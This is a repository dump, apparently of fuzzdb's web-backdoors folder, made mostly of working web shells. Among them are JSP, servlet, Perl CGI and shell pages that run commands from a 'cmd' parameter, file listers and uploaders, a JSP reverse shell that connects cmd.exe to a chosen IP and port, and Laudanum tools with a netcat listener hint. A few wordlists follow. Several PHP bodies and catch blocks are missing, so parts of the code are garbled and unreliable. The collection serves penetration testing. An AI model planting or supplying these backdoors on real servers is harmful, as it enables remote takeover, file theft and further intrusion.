15 | 
16 | 
    
17 | 
    18 | <%
19 | if (request.getParameter("cmd") != null) {
20 |         out.println("Command: " + request.getParameter("cmd") + "
    ");
21 |         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
22 |         OutputStream os = p.getOutputStream();
23 |         InputStream in = p.getInputStream();
24 |         DataInputStream dis = new DataInputStream(in);
25 |         String disr = dis.readLine();
26 |         while ( disr != null ) {
27 |                 out.println(disr); 
28 |                 disr = dis.readLine(); 
29 |                 }
30 |         }
31 | %>
32 | 
    
33 | 
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/cmdjsp.jsp:
--------------------------------------------------------------------------------
 1 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 
 2 | 
 3 | 
    
 4 | 
 5 | 
 6 | 
    
 7 | 
 8 | <%@ page import="java.io.*" %>
 9 | <%
10 |    String cmd = request.getParameter("cmd");
11 |    String output = "";
12 | 
13 |    if(cmd != null) {
14 |       String s = null;
15 |       try {
16 |          Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
17 |          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
18 |          while((s = sI.readLine()) != null) {
19 |             output += s;
20 |          }
21 |       }
22 |       catch(IOException e) {
23 |          e.printStackTrace();
24 |       }
25 |    }
26 | %>
27 | 
28 | 
    29 | <%=output %>
30 | 
    
31 | 
32 | 
33 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/jsp-reverse.jsp:
--------------------------------------------------------------------------------
 1 | // backdoor.jsp
 2 | // http://www.security.org.sg/code/jspreverse.html
 3 | 
 4 | <%@
 5 | page import="java.lang.*, java.util.*, java.io.*, java.net.*"
 6 | % >
 7 | <%!
 8 | static class StreamConnector extends Thread
 9 | {
10 |         InputStream is;
11 |         OutputStream os;
12 | 
13 |         StreamConnector(InputStream is, OutputStream os)
14 |         {
15 |                 this.is = is;
16 |                 this.os = os;
17 |         }
18 | 
19 |         public void run()
20 |         {
21 |                 BufferedReader isr = null;
22 |                 BufferedWriter osw = null;
23 | 
24 |                 try
25 |                 {
26 |                         isr = new BufferedReader(new InputStreamReader(is));
27 |                         osw = new BufferedWriter(new OutputStreamWriter(os));
28 | 
29 |                         char buffer[] = new char[8192];
30 |                         int lenRead;
31 | 
32 |                         while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
33 |                         {
34 |                                 osw.write(buffer, 0, lenRead);
35 |                                 osw.flush();
36 |                         }
37 |                 }
38 |                 catch (Exception ioe)
39 | 
40 |                 try
41 |                 {
42 |                         if(isr != null) isr.close();
43 |                         if(osw != null) osw.close();
44 |                 }
45 |                 catch (Exception ioe)
46 |         }
47 | }
48 | %>
49 | 
50 | 
    JSP Backdoor Reverse Shell
    
51 | 
52 | 
    
53 | IP Address
54 | 
55 | Port
56 | 
57 | 
58 | 
    
59 | 
    
60 | 
    
61 | 
62 | <%
63 | String ipAddress = request.getParameter("ipaddress");
64 | String ipPort = request.getParameter("port");
65 | 
66 | if(ipAddress != null && ipPort != null)
67 | {
68 |         Socket sock = null;
69 |         try
70 |         {
71 |                 sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
72 | 
73 |                 Runtime rt = Runtime.getRuntime();
74 |                 Process proc = rt.exec("cmd.exe");
75 | 
76 |                 StreamConnector outputConnector =
77 |                         new StreamConnector(proc.getInputStream(),
78 |                                           sock.getOutputStream());
79 | 
80 |                 StreamConnector inputConnector =
81 |                         new StreamConnector(sock.getInputStream(),
82 |                                           proc.getOutputStream());
83 | 
84 |                 outputConnector.start();
85 |                 inputConnector.start();
86 |         }
87 |         catch(Exception e) 
88 | }
89 | %>
90 | 
91 | 
92 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/laudanum/cmd.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/laudanum/cmd.war


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/laudanum/makewar.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | jar -cvf cmd.war warfiles/*
4 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/laudanum/warfiles/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Created-By: 1.6.0_10 (Sun Microsystems Inc.)
3 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/laudanum/warfiles/WEB-INF/web.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 7 | 
 8 | Command
 9 | /cmd.jsp
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/laudanum/warfiles/cmd.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*"%>
 2 | <%
 3 | 
 4 | if (request.getRemoteAddr() != "4.4.4.4") {
 5 | 	response.sendError(HttpServletResponse.SC_NOT_FOUND)
 6 | 	return;
 7 | }
 8 | 
 9 | %>
10 | 
11 | Laudanum JSP Shell
12 | 
13 | Commands with JSP
14 | 
    
15 | 
16 | 
    
17 | If you use this against a Windows box you may need to prefix your command with cmd.exe /c
18 | 
    
19 | 
    20 | <%
21 | if (request.getParameter("cmd") != null) {
22 | out.println("Command: " + request.getParameter("cmd") + "
    ");
23 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
24 | OutputStream os = p.getOutputStream();
25 | InputStream in = p.getInputStream();
26 | DataInputStream dis = new DataInputStream(in);
27 | String disr = dis.readLine();
28 | while ( disr != null ) {
29 | out.println(disr);
30 | disr = dis.readLine();
31 | }
32 | }
33 | %>
34 | 
    
35 | 
    
36 | 
    
37 | Copyright © 2014, Kevin Johnson and the Laudanum team.
    
38 | Written by Tim Medin.
    
39 | Get the latest version at laudanum.secureideas.net.
40 | 
    
41 | 
42 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/list.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // list.jsp = Directory & File View
 7 | //
 8 | // by: Sierra
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | <%
13 | if(request.getParameter("file")==null) {
14 | 	%>
15 | 	
16 | 	
    
17 | 	
18 | 	
19 | 	
    
20 | 	<%
21 | 	}
22 | %>
23 | <% //read the file name.
24 | try { 
25 | File f = new File(request.getParameter("file"));
26 | if(f.isDirectory()) {
27 | 	int i;
28 | 	String fname = new String("Unknown");
29 | 	String fcolor = new String("Black");
30 | 	%>
31 | 	
32 | 	
33 | 	<%
34 | 	out.print("Path: " + f.toString() + "
     
    ");
35 | 	File flist[] = f.listFiles();
36 | 	for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n");
53 | 		}
54 | 	%>
55 | 	    
56 | 	<%
57 | 
58 | 	} else {
59 | 	if(f.canRead() == true) {
60 | 		InputStream in = new FileInputStream(f);
61 | 		ServletOutputStream outs = response.getOutputStream();
62 | 		int left = 0;
63 | 			try {
64 | 			while((left) >= 0 ) {
65 | 				left = in.read(); 
66 | 				outs.write(left);
67 | 				}
68 | 			} catch(IOException ex) {ex.printStackTrace();}
69 | 		outs.flush();
70 | 		outs.close();
71 | 		in.close();	
72 | 		} else {
73 | 		out.print("Can't Read file
    ");
74 | 		}
75 | 	}
76 | } catch(Exception ex) {ex.printStackTrace();}
77 | %>


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/simple.jsp:
--------------------------------------------------------------------------------
1 | <% 
2 | Runtime.getruntime().exec(request.getParameter("cmd")) 
3 | %>
4 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/win32/cmd_win32.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // cmd.jsp = Command Execution (win32)
 7 | //
 8 | // by: Unknown
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | 
13 | 
    
14 | 
15 | 
16 | 
    
17 | 
    18 | <%
19 | if (request.getParameter("cmd") != null) {
20 |         out.println("Command: " + request.getParameter("cmd") + "\n
    ");
21 |         Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
22 |         OutputStream os = p.getOutputStream();
23 |         InputStream in = p.getInputStream();
24 |         DataInputStream dis = new DataInputStream(in);
25 |         String disr = dis.readLine();
26 |         while ( disr != null ) {
27 |                 out.println(disr); disr = dis.readLine(); }
28 |         }
29 | %>
30 | 
    
31 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/php/cmd.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
    
13 | 
14 | 
15 | 
    
16 | 
    17 | 
22 | 
    
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/php/list.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | " . $filename . "
    ";
23 |     }
24 |   closedir($handle);
25 |   } else {
26 |   echo "FILE: " . $fichero . "
    ";
27 |   $fp = fopen($fichero, "r");
28 |   $buffer = fread($fp, filesize($fichero));
29 |   echo $buffer;
30 |   fclose($fp);
31 |   }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/php/simple-backdoor.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "
    ";
10 |         die;
11 | }
12 | 
13 | ?>
14 | 
15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
16 | 
17 | 
18 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/php/tiny.php:
--------------------------------------------------------------------------------
1 | 
6 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/php/up.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 
    
15 | 
16 | 
    Local File: 
17 | 
    Remote File: 
18 | 
19 | 



    
20 | 
21 | 
31 | 
32 | 
33 | 
34 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/pl-cgi/cmd.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | #
 3 | # PerlKit-0.1 - http://www.t0s.org
 4 | #
 5 | # cmd.pl: Run commands on a webserver
 6 | 
 7 | use strict;
 8 | 
 9 | my ($cmd, %FORM);
10 | 
11 | $|=1;
12 | 
13 | print "Content-Type: text/html\r\n";
14 | print "\r\n";
15 | 
16 | # Get parameters
17 | 
18 | %FORM = parse_parameters($ENV{'QUERY_STRING'});
19 | 
20 | if(defined $FORM{'cmd'}) {
21 |   $cmd = $FORM{'cmd'};
22 | }
23 | 
24 | print '
25 | 
26 | 
    
27 | 
28 | 
29 | 
    
30 | 
    ';
31 | 
32 | if(defined $FORM{'cmd'}) {
33 |   print "Results of '$cmd' execution:\n\n";
34 |   print "-"x80;
35 |   print "\n";
36 | 
37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 | 
39 |   while() {
40 |     print;
41 |   }
42 | 
43 |   close(CMD);
44 |   print "-"x80;
45 |   print "\n";
46 | }
47 | 
48 | print "
    ";
49 | 
50 | sub parse_parameters ($) {
51 |   my %ret;
52 | 
53 |   my $input = shift;
54 | 
55 |   foreach my $pair (split('&', $input)) {
56 |     my ($var, $value) = split('=', $pair, 2);
57 |     
58 |     if($var) {
59 |       $value =~ s/\+/ /g ;
60 |       $value =~ s/%(..)/pack('c',hex($1))/eg;
61 | 
62 |       $ret{$var} = $value;
63 |     }
64 |   }
65 | 
66 |   return %ret;
67 | }
68 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/pl-cgi/list.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl
  2 | #
  3 | # PerlKit-0.1 - http://www.t0s.org
  4 | #
  5 | # browse.pl: Browse and download files from a webserver
  6 | 
  7 | use strict;
  8 | 
  9 | my ($path, %FORM);
 10 | 
 11 | $|=1;
 12 | 
 13 | 
 14 | # Get parameters
 15 | 
 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'});
 17 | 
 18 | if(defined $FORM{'path'}) {
 19 |   $path = $FORM{'path'};
 20 | 
 21 | 
 22 | } else {
 23 |   $path = "/";
 24 | }
 25 | 
 26 | if(-f $path) { # Download selected file
 27 |   print "Content-Type: application/octet-stream\r\n";
 28 |   print "\r\n";
 29 |   open(FILE, "< $path") || print "Could not open file\n";
 30 | 
 31 |   while() {
 32 |     print;
 33 |   }
 34 | 
 35 |   close(FILE);
 36 |   exit;
 37 | }
 38 | 
 39 | print "Content-Type: text/html\r\n";
 40 | print "\r\n";
 41 | 
 42 | print '
 43 | 
 44 | 
    
 45 | 
 46 | 
 47 | 
    
 48 | Directory ' . $path . ' contents:
 49 | 
    
 50 | 
 51 | ';
 52 | 
 53 | if(defined $FORM{'path'}) {
 54 | 
 55 |   opendir(DIR, $path) || print "Could not open directory";
 56 | 
 57 |   foreach (sort(readdir(DIR))) {
 58 |     print get_fileinfo($path, $_). "\n";
 59 |   }
 60 | 
 61 |   closedir(DIR);
 62 |   
 63 | }
 64 | 
 65 | print "
    ";
 66 | 
 67 | sub parse_parameters ($) {
 68 |   my %ret;
 69 | 
 70 |   my $input = shift;
 71 | 
 72 |   foreach my $pair (split('&', $input)) {
 73 |     my ($var, $value) = split('=', $pair, 2);
 74 | 
 75 |     if($var) {
 76 |       $value =~ s/\+/ /g ;
 77 |       $value =~ s/%(..)/pack('c',hex($1))/eg;
 78 | 
 79 |       $ret{$var} = $value;
 80 |     }
 81 |   }
 82 | 
 83 |   return %ret;
 84 | }
 85 | 
 86 | sub get_fileinfo ($$) {
 87 |   my $ret;
 88 | 
 89 |   my ($dir,$filename) = @_;
 90 |   my $file = $dir . "/" . $filename;
 91 | 
 92 |   $file=~s/\/+/\//g;
 93 | 
 94 |   $ret = "";
 95 | 
 96 |   $ret .= "";
 97 | 
 98 |   if(-d $file) {
 99 |     $file=~s/\/[^\/]+\/\.\./\//g;
100 |     $ret .= "$filename";
101 |   } else {
102 |     $ret .= "$filename [D]" ;
103 |   }
104 |   $ret .= "";
105 | 
106 |   my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
107 | 
108 |   $ret .= " ";
109 |   $ret .= "$size";
110 |   $ret .= "". getpwuid($uid) ."";
111 |   $ret .= "". getgrgid($gid) ."";
112 | 
113 |   $ret .= "";
114 | 
115 |   return $ret;
116 | }
117 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/pl-cgi/perlcmd.cgi:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl -w
 2 | 
 3 | use strict;
 4 | 
 5 | print "Cache-Control: no-cache\n";
 6 | print "Content-type: text/html\n\n";
 7 | 
 8 | my $req = $ENV{QUERY_STRING};
 9 | 	chomp ($req);
10 | 	$req =~ s/%20/ /g; 
11 | 	$req =~ s/%3b/;/g;
12 | 
13 | print "";
14 | 
15 | print '';
16 | 
17 | 	if (!$req) {
18 | 		print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
19 | 	}
20 | 	else {
21 | 		print "Executing: $req";
22 | 	}
23 | 
24 | 	print "
    ";
25 | 	my @cmd = `$req`;
26 | 	print "
    ";
27 | 
28 | 	foreach my $line (@cmd) {
29 | 		print $line . "
    ";
30 | 	}
31 | 
32 | print "";
33 | 
34 | # 
35 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/servlet/CmdServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * CmdServlet.java	20/01/2004
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class CmdServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 
18 | 		PrintWriter out = res.getWriter();
19 | 		out.print("");
20 | 		out.print("
    ");
21 | 		out.print("");
22 | 		out.print("");
23 | 		out.print("
    ");
24 | 
25 | 		if(req.getParameter("cmd") != null) {
26 | 	        out.print("\n
    Command: " + req.getParameter("cmd") + "\n

    \n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
    ");
36 | 		out.print("");
37 |     }
38 | 
39 |     public String getServletInfo() {
40 | 		return "CmdServlet 0.1";
41 |     }
42 | 
43 | }
44 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/servlet/ListServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * ListServlet.java
 3 |  *
 4 |  * @author Sierra
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 | 
12 | public class ListServlet extends HttpServlet
13 | {
14 | 
15 | 
16 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 |         PrintWriter printwriter = res.getWriter();
18 | 		String path = req.getParameter("file");
19 | 
20 | 		printwriter.write("\n\nDirectory Listing\n\n\n");
21 | 		printwriter.write("\n");
22 | 		if(req.getParameter("file")==null) path = "c:\\";
23 | 		printwriter.write("

    Path: " + path + "

    \n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n");
61 | 			}
62 | 
63 | 			printwriter.write("
    ");
64 | 		} else
65 | 		if(file.canRead())
66 | 		{
67 | 			FileInputStream fileinputstream = new FileInputStream(file);
68 | 			int j = 0;
69 | 				while(j >= 0)
70 | 				{
71 | 					j = fileinputstream.read();
72 | 					printwriter.write(j);
73 | 				}
74 | 			fileinputstream.close();
75 | 		} else
76 | 		{
77 | 			printwriter.write("Can't Read file
    ");
78 | 		}
79 | 
80 |     }
81 | 
82 | 
83 |     public String getServletInfo() {
84 |         return "Directory Listing";
85 |     }
86 | }


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/servlet/UpServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * UpServlet.java	29/04/2005
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class UpServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 		PrintWriter out = res.getWriter();
18 | 		out.print("");
19 | 		out.print("
    ");
20 | 		out.print("UPLOAD ");
21 | 		out.print("");
22 | 		out.print("
    ");
23 | 		out.print("");
24 | 	}
25 | 
26 | 
27 |     public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | 		String tag = new String();
29 | 		int c = '\0';
30 | 		int contador = 0;
31 | 		ServletInputStream in = req.getInputStream();
32 |         DataInputStream post = new DataInputStream(in);
33 | 
34 | 		PrintWriter out = res.getWriter();
35 | 		res.setContentType("text/html");
36 | 		out.print("
    ");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/sh/cmd.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/sh/cmd.sh


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/sh/list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # SH_KIT
 4 | #
 5 | # list.sh = Directory & File Listing
 6 | #
 7 | # by: The Dark Raver
 8 | # modified: 16/12/2005
 9 | #
10 | 
11 | echo Content-Type: text/html
12 | echo
13 | 
14 | if [ "$QUERY_STRING" != "" ]
15 |   then
16 |   echo PATH: $QUERY_STRING "
    "
17 |   echo `ls $QUERY_STRING` > /tmp/test
18 |   else
19 |   echo PATH: / "
    "
20 |   echo > /tmp/test
21 |   QUERY_STRING="/"
22 |   root="1"
23 |   fi
24 | 
25 | out=`grep "/" /tmp/test`
26 | 
27 | if [ "$out" != "" ]
28 |   then
29 |     echo FICHERO: $QUERY_STRING
30 |     echo "
    "
31 |     cat $QUERY_STRING
32 |   else
33 |     if [ "$root" != "1" ]
34 |       then
35 |       echo "( ) ".."
    "
36 |       fi
37 |     for i in `ls $QUERY_STRING`
38 |       do
39 |       if [ "$root" == "1" ] 
40 |         then 
41 |         echo "( ) "$i"
    "
42 |         else 
43 |         echo "( ) "$i"
    "
44 |         fi
45 |       done
46 | 
47 |   fi


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/sh/up.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # BETA1 - upload to /tmp/upload
 4 | #
 5 | # SH_KIT
 6 | #
 7 | # up.sh = File Upload
 8 | #
 9 | # by: The Dark Raver
10 | # modified: 16/12/2005
11 | #
12 | 
13 | echo Content-Type: text/html
14 | echo
15 | 
16 | echo ""
17 | echo "
    "
18 | echo "
    Local File: "
19 | echo ""
20 | echo "



    "
21 | 
22 | echo "
    "
23 | 
24 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
25 | 
26 | lineas=`cat /tmp/test | wc -l`
27 | #echo LIN: $lineas
28 | lineas2=`expr $lineas - 4`
29 | #echo LIN2: $lineas2
30 | lineas3=`expr $lineas2 - 1`
31 | #echo LIN3: $lineas3
32 | 
33 | #echo "
    "
34 | 
35 | tail -$lineas2 /tmp/test > /tmp/test2
36 | head -$lineas3 /tmp/test2 > /tmp/upload
37 | #rm /tmp/test
38 | #rm /tmp/test2
39 | 
40 | echo "
    "
41 | cat /tmp/upload
42 | echo "
    "
43 | 
44 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/wordpress/templates/README.md:
--------------------------------------------------------------------------------
1 | .
2 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/wordpress/templates/ipcheck.php:
--------------------------------------------------------------------------------
 1 | 
14 | ***
15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team
16 | ***
17 | ********************************************************************************
18 | ***
19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
20 | *** by someone other than the person who uploaded Laudanum.  This file should be included
21 | *** in other Laudanum tools and not called directly. 
22 | *** Written by Jason Gillam 
23 | ***
24 | ********************************************************************************
25 | *** This program is free software; you can redistribute it and/or
26 | *** modify it under the terms of the GNU General Public License
27 | *** as published by the Free Software Foundation; either version 2
28 | *** of the License, or (at your option) any later version.
29 | ***
30 | *** This program is distributed in the hope that it will be useful,
31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of
32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
33 | *** GNU General Public License for more details.
34 | ***
35 | *** You can get a copy of the GNU General Public License from this
36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple
38 | *** Place - Suite 330, Boston, MA  02111-1307, USA.
39 | ***
40 | ***************************************************************************** */
41 | 
42 | 
43 | // ***************** Config entries below ***********************
44 | // IPs are enterable as individual addresses TODO: add CIDR support
45 | $wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");
46 |  	
47 | 
48 | # *********** No editable content below this line **************
49 | 
50 | $wpl_allowed = 0;
51 | foreach ($wpl_allowedIPs as $IP) {
52 |     if ($_SERVER["REMOTE_ADDR"] == $IP)
53 |         $wpl_allowed = 1;
54 | }
55 | 
56 | if ($wpl_allowed == 0) {
57 |     header("HTTP/1.0 404 Not Found");
58 |     die();
59 | }
60 | 
61 | ?>


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/wordpress/templates/settings.php:
--------------------------------------------------------------------------------
 1 | 
13 | ***         Tim Medin 
14 | ***
15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team
16 | ***
17 | ********************************************************************************
18 | ***
19 | *** This file provides a convenient menu of Laudanum  tools from a Word Press settings
20 | *** page.
21 | ***
22 | *** Written by Jason Gillam 
23 | ***
24 | ********************************************************************************
25 | *** This program is free software; you can redistribute it and/or
26 | *** modify it under the terms of the GNU General Public License
27 | *** as published by the Free Software Foundation; either version 2
28 | *** of the License, or (at your option) any later version.
29 | *** 
30 | *** This program is distributed in the hope that it will be useful,
31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of
32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
33 | *** GNU General Public License for more details.
34 | *** 
35 | *** You can get a copy of the GNU General Public License from this
36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple
38 | *** Place - Suite 330, Boston, MA  02111-1307, USA.
39 | ***
40 | ***************************************************************************** */
41 | ?>
42 | 
43 | 
44 | 
    
45 | 	
    Laudanum Tools
    
46 | 	
65 | 	* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
66 | 
    
67 | 	


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/accidental_profanity.txt:
--------------------------------------------------------------------------------
 1 | Scunthorpe General Hospital
 2 | Penistone Community Church
 3 | Lightwater Country Park
 4 | Jimmy Clitheroe
 5 | Horniman Museum
 6 | shitake mushrooms
 7 | RomansInSussex.co.uk
 8 | http://www.cum.qc.ca/
 9 | Craig Cockburn, Software Specialist
10 | Linda Callahan
11 | Dr. Herman I. Libshitz
12 | magna cum laude
13 | Super Bowl XXX
14 | medieval erection of parapets
15 | evaluate
16 | mocha
17 | expression
18 | Arsenal canal
19 | classic
20 | Tyson Gay
21 | Dick Van Dyke
22 | basement
23 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/common-http-ports.txt:
--------------------------------------------------------------------------------
 1 | 66
 2 | 80
 3 | 81
 4 | 443
 5 | 445
 6 | 457
 7 | 1080
 8 | 1100
 9 | 1241
10 | 1352
11 | 1433
12 | 1434
13 | 1521
14 | 1944
15 | 2301
16 | 3128
17 | 3306
18 | 4000
19 | 4001
20 | 4002
21 | 4100
22 | 5000
23 | 5432
24 | 5800
25 | 5801
26 | 5802
27 | 6346
28 | 6347
29 | 7001
30 | 7002
31 | 8080
32 | 8888
33 | 30821
34 | 


--------------------------------------------------------------------------------
/fuzzdb/wordlists-misc/numeric.txt:
--------------------------------------------------------------------------------
 1 | 0
 2 | 1
 3 | 1.00
 4 | $1.00
 5 | 1/2
 6 | 1E2
 7 | 1E02
 8 | 1E+02
 9 | -1
10 | -1.00
11 | -$1.00
12 | -1/2
13 | -1E2
14 | -1E02
15 | -1E+02
16 | 1/0
17 | 0/0
18 | -2147483648/-1
19 | -9223372036854775808/-1
20 | -0
21 | -0.0
22 | +0
23 | +0.0
24 | 0.00
25 | 0..0
26 | .
27 | 0.0.0
28 | 0,00
29 | 0,,0
30 | ,
31 | 0,0,0
32 | 0.0/0
33 | 1.0/0.0
34 | 0.0/0.0
35 | 1,0/0,0
36 | 0,0/0,0
37 | --1
38 | -
39 | -.
40 | -,
41 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
42 | NaN
43 | Infinity
44 | -Infinity
45 | INF
46 | 1#INF
47 | -1#IND
48 | 1#QNAN
